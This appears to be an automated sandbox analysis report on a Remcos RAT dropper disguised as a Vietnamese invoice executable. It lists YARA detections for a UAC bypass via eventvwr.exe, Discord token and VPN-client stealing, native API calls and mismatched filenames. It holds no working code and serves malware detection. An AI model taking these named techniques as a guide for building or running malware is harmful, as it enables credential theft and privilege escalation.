Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Detected potential crypto function

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_00B4C114	0_2_00B4C114
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_00B4E558	0_2_00B4E558
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_00B4E548	0_2_00B4E548
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E5FB0	0_2_077E5FB0
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EB620	0_2_077EB620
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E9084	0_2_077E9084
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E5FA0	0_2_077E5FA0
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EB60F	0_2_077EB60F
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EB5C3	0_2_077EB5C3
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E63CF	0_2_077E63CF
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077EA244	0_2_077EA244
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E5068	0_2_077E5068
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E5059	0_2_077E5059
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E0040	0_2_077E0040
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_077E003E	0_2_077E003E
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Code function: 0_2_078C83A0	0_2_078C83A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 12_2_10017194	12_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044B040	14_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0043610D	14_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00447310	14_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044A490	14_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0040755A	14_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0043C560	14_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044B610	14_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044D6C0	14_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_004476F0	14_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044B870	14_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044081D	14_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00414957	14_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_004079EE	14_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00407AEB	14_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044AA80	14_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00412AA9	14_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00404B74	14_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00404B03	14_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0044BBD8	14_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00404BE5	14_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00404C76	14_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00415CFE	14_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00416D72	14_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00446D30	14_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00446D8B	14_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00406E8F	14_2_00406E8F

Uses 32bit PE files

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00416760 appears 69 times

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	14_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_00401806 NtdllDefWindowProc_W,	14_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 14_2_004018C0 NtdllDefWindowProc_W,	14_2_004018C0

Sample file is different than original file name gathered from version info

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000000.251222049.0000000000182000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCgfcxatykt.exe" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.365213489.0000000007610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVgnaaeoogibheqcdzitcbxs.dll" vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
